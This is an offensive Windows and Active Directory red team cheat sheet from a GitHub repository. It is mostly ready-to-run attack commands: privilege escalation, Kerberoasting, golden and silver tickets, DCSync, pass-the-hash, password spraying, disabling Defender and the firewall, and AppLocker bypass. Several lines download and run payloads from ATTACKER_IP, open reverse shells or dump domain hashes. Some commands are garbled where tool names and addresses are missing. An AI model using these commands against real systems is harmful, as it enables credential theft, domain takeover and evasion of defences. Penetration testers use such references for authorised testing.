Windows Red Team Cheat Sheet


Windows for Red Teamers


# Systeminfo

# Especially good with hotfix info
wmic qfe get Caption,Description,HotFixID,InstalledOn

# What users/localgroups are on the machine?
net users
net localgroups
net localgroup Administrators
net user morph3

# Crosscheck local and domain too
net user morph3 /domain
net group Administrators /domain

# Network information
ipconfig /all
route print
arp -A

# To see what tokens we have 
whoami /priv

# Recursive string scan
findstr /spin "password" *.*

# Running processes
tasklist /SVC

# Network connections
netstat -ano

# Search for writeable directories
dir /a-r-d /s /b

### Some good one-liners

# Obtain the path of the executable called by a Windows service (good for checking Unquoted Paths):
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul

Elevation of Privileges


# PowerShellMafia
# Use always dev branch others are shit.
powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System"

# Sherlock

# Unquoted paths
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v


Simple logic for kerberoast is requesting tickets and cracking them(offline, doesn’t produce any logs) — For kerberos to work, times have to be within 5 minutes between attacker and victim.

# Rubeus 
.\.rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234

# List available tickets
setspn.exe -t evil.corp -q */*
powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
cscript.exe GetUserSPNs.ps1

# List cached tickets
Invoke-Mimikatz -Command '"kerberos::list"'
powershell.exe -c "klist"
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'"

# Request tickets 
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"

# Requesting remotely
python -request ECORP/morph3:supersecurepassword@

# Extract tickets
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat"
Invoke-Mimikatz -Command '"kerberos::list /export"'

# Crack Tickets
python /usr/share/wordlists/rockyou.txt ticket.kirbi

Juicy Potato #Pick one CLSID from here according to your system

Required tokens SeAssignPrimaryTokenPrivilege SeImpersonatePrivilege

C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a "/c whoami > C:\Users\Public\morph3.txt" -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}

Stored Credential

# To check if there is any stored keyscmdkey /list

# Using them
runas /user:administrator /savecred "cmd.exe /k whoami"

Impersonating Tokens with meterpreter

use incognito
list_tokens -u
impersonate_token NT-AUTHORITY\System

Lateral Movement

PsExec, SmbExec, WMIExec, RDP, PTH in general. WinRM is always good. Check groups carefully. Since windows gave support to OpenSSH we should also consider SSH.

Mimikatz Ticket PTH

mimikatz.exe '" kerberos:ptt C:\Users\Public\ticketname.kirbi"' "exit"
Enter-PSSession -ComputerName ECORP


$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }

# Evil-WinRM
ruby evil-winrm.rb -i -u morph3 -p morph3 -r evil.corp

PTH with Mimikatz

Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'

Database Links

# PowerUpSQL

Get-SQLServerLink -Instance server -Verbose
powershell.exe -c "Import-Module C:\Users\Public\PowerUpSQL.ps1; Invoke-SQLEscalatePriv -Verbose -Instance ECORP\sql"

# To see servers 
select srvname from master..sysservers;

# Native
Get-SQLServerLinkCrawl -Instance server -Query "exec master..xp_cmdshell 'whoami'"

# Linked database tables
select * from openquery("ECORP\FOO", 'select TABLE_NAME from FOO.INFORMATION_SCHEMA.TABLES') 

# You can also use meterpreter module exploit/windows/mssql/mssql_linkcrawler
# With meterpreter module you can find linked databases and if you are admin on them

# You can do a query and try to enable xp_cmpshell on that server
select * from openquery("server",'select * from master..sysservers') EXECUTE AS USER = 'internal_user' ('sp_configure "xp_cmdshell",1;reconfigure;') AT "server"

Golden and Silver Tickets

Keys depend of ticket : –> for a Golden, they are from the krbtgt account; –> for a Silver, it comes from the “computer account” or “service account”.

# Golden Ticket
# Extract the hash of the krbtgt user
lsadump::dcsync /domain:evil.corp /user:krbtgt
lsadump::lsa /inject
lsadump:::lsa /patch
lsadump::trust /patch

# creating the ticket 
# /rc4 or /krbtgt - the NTLM hash
# /sid you will get this from krbtgt dump
# /ticket parameter is optional but default is ticket.kirbi
# /groups parameter is optional but default is 513,512,520,518,519
# /id you can fake users and supply valid Administrator id 

kerberos::golden /user:morph3 /domain:evil.corp /sid:domains-sid /krbtgt:krbtgt-hash /ticket:ticket.kirbi /groups:501,502,513,512,520,518,519 
kerberos::ptt golden.tck # you can also add /ptt at the kerberos::golden command
# After this , final ticket must be ready

# You can now verify that your ticket is in your cache 
powershell.exe -c "klist"
# Verify that golden ticket is working
dir \\DC\C$
psexec.exe \\DC cmd.exe

# Purge the currently cached kerberos ticket

#metasploit module can also be used for golden ticket, it loads the ticket into given session

# Silver Ticket
# Silver Ticket allows escalation of privileges on DC
# /target t he server/computer name where the service is hosted (ex: share.server.local, sql.server.local:1433, ...)
# /service - The service name for the ticket (ex: cifs, rpcss, http, mssql, ...)

# Examples
kerberos::golden /user:morph3 /domain:domain /sid:domain-sid /target:evilcorp-sql102.evilcorp.local.1433 /service:MSSQLSvc /rc4:service-hash /ptt /id:1103
sqlcmd -S evilcorp-sql102.evilcorp.local

kerberos::golden /user:JohnDoe /id:500 / /sid:S-1-5-21-1234567890-123456789-1234567890 / /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt

AD Attacks


# Basic ldap enumeration
enum4linux -a
python -u morph3 -p morph3 -d evil.corp --dc-ip
python -d -l -u Administrator -p P@ssw0rd

Bruteforce on ldap

# Password spray
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt

# Password brute
./kerbrute_linux_amd64 bruteuser -d evil.corp --dc rockyou.txt morph3

# Username brute
./kerbrute_linux_amd64 userenum -d evil.corp --dc users.txt

# Password spray
./kerbrute_linux_amd64 passwordspray -d evil.corp --dc users.txt rockyou.txt

DC Shadow

DC Shadow attack aims to inject malicious Domain Controlllers into AD infrastructure so that we can dump actual AD members. 

#Find sid for that user
wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid

#This will create a RPC Server and listen
lsadump::dcshadow /object:"CN=morph3,OU=Business,OU=Users,OU=ECORP,DC=ECORP,DC=local" /attribute:sidhistory /value:sid

# Run this from another mimikatz
lsadump::dcshadow /push

# After this unregistration must be done
# Relogin

lsadump::dcsync /domain:ECORP.local /account:krbtgt

# Now you must have krbtgt hash

DC Sync

lsadump::dcsync /domain:domain /all /csv
lsadump::dcsync /user:krbtgt

powershell.exe -c "Import-Module .\Invoke-DCSync.ps1; Invoke-DCSync -PWDumpFormat"

python -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@
python -system /tmp/SYSTEM -ntds /tmp/ntds.dit LOCAL

Bypass-Evasion Techniques

Powershell Constrained Language Bypass

powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')

powershell.exe -exec bypass -c

Windows Defender

sc config WinDefend start= disabled
sc stop WinDefend
# Powershell
Set-MpPreference -DisableRealtimeMonitoring $true
# Remove definitions
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All


Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off

Ip Whitelisting

New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP

Applocker ByPass

# Multistep process to bypass applocker via MSBuild.exe:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=9001  -f csharp -e x86/shikata_ga_nai -i  > out.cs 

# Replace the buf-sc and save it as out.csproj

Invoke-WebRequest "http://ATTACKER_IP/payload.csproj" -OutFile "out.csproj"; C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe .\out.csproj

# or you can simply use my tool :)
sudo python -a x86 -i 10 --lhost --lport 9001 -m


# This also needs Veil-Framework
python --ip --port 443 -t Bypass -p installutil/powershell/ -c "OBFUSCATION=ascii SCRIPT=/root/script.ps1"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false payload1.exe

python3 -t Bypass -p regasm/meterpreter/rev_tcp --ip --port 9001
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U payload.dll


#Preparing payloads
python EncrypterAssembly/ EvilSalsa.dll supersecretpass123 evilsalsa.dll.txt
EncrypterAssembly.exe EvilSalsa.dll supersecretpass123 evilsalsa.dll.txt

#Executing payload
SalseoLoader.exe password http://ATTACKER_IP/evilsalsa.dll.txt reversetcp ATTACKER_IP 9001

# Reverse icmp shell
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp ATTACKER_IP


Changing Permissions of a file

icacls text.txt /grant Everyone:F

Downloading files

IEX (New-Object System.Net.WebClient).DownloadString("http://ATTACKER_IP/rev.ps1")
(New-Object System.Net.WebClient).DownloadFile("http://ATTACKER_SERVER/malware.exe", "C:\Windows\Temp\malware.exe")  
Invoke-WebRequest "http://ATTACKER_SERVER/malware.exe" -OutFile "C:\Windows\Temp\malware.exe"  

certutil.exe -urlcache -split -f "" shell.exe

Adding user to Domain admins

Add-DomainGroupMember -Identity 'Domain Admins' -Members morph3 -Verbose

Base64 Encode-Decode

certutil -decode foo.b64 foo.exe
certutil -encode foo.exe foo.b64

Network sharing

# Local share
net share
wmic share get /format:list

# Remote share
net view
net view \\ /all
wmic /node: share get

# Mounting share
net use Z: \\\C$ /user:morph3 password123

Port Forwarding

# Port forward using plink
plink.exe -l morph3 -pw pass123 -R 8080:

# Port forward using meterpreter
portfwd add -l attacker-port -p victim-port -r victim-ip
portfwd add -l 3306 -p 3306 -r

Powershell Portscan

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(VICTIM_IP,$_)) "Port $_ is open!"} 2>$null

Recovering Powershell Secure String

$user = "morph3"
$file = "morph3-pass.xml"
$cred= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, (Get-Content $file | ConvertTo-SecureString)
Invoke-Command -ComputerName ECORP -Credential $cred -Authentication credssp -ScriptBlock { whoami }


$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($password)
$result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)

Injecting PowerShell scripts Into sessions

Invoke-Command -FilePath scriptname -Sessions $sessions
Enter-PSSession -Session $sess

Enable RDP

# CMD 
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

# Powershell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

# Optional
net localgroup "Remote Desktop Users" morph3 /add

# Reruling firewall
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow

Decrypting EFS files with Mimikatz

Follow the link here How to Decrypt EFS Files

crypto::system /file:"C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\thecert" /export

dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id"

# Clear text password 
dpapi::masterkey /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\SID\masterkey" /password:pass123

# After this command you must have the exported .der and .pvk files
dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id" /masterkey:f2c9ea33a990c865e985c496fb8915445895d80b

openssl x509 -inform DER -outform PEM -in blah.der -out public.pem

openssl rsa -inform PVK -outform PEM -in blah.pvk -out private.pem

openssl pkcs12 -in public.pem -inkey private.pem -password pass:randompass -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

# Import the certificate
certutil -user -p randompass -importpfx cert.pfx NoChain,NoRoot

type "C:\Users\Administrator\Documents\encrypted.txt"

Post exploitation – information gathering

Reading Event Logs

User must be in “Event Log Reader” group Follow this link

Get-WinEvent -ListLog *

# Listing logs of a specific user
$cred = Get-Credentials
Get -WinEvent -ListLog * -ComputerName AD1 -Credentials $cred

# Reading Security logs
(Get-WinEvent -FilterHashtable @{LogName = 'Security'} | Select-Object @{name='NewProcessNam
e';expression={ $_.Properties[5].Value }}, @{name='CommandLine';expression={
$_.Properties[8].Value }}).commandline

Password Dump

# Metasploit

# Empire

# mimikatz

Shadow copy

There might be a case where you are privileged but can’t read-access to shadow files(NTDS.dit, SYSTEM etc.)

set context persistent nowriters
add volume C: alias morph3
expose %morph3% Z:

# Deletion
delete shadows volume %morph3%

NTDS.dit dump -system /tmp/SYSTEM -ntds /tmp/ntds.dit -outputfile /tmp/result local

python -u morph3 -p pass1234 -d --ntds drsuapi

# on DC, lsass.exe can dump hashes
lsadump::lsa /inject

Summary of tools

Ad Environment

icebreaker bloodhound

Post Exploitation

Empire DeathStar CrackMapExec – CME Covenant Rubeus SharpDPAPI


Ebowla Veil-Framework PsBypassCLM

Swiss Knife


The Red Team is a github repository by Melih Kaan Yıldız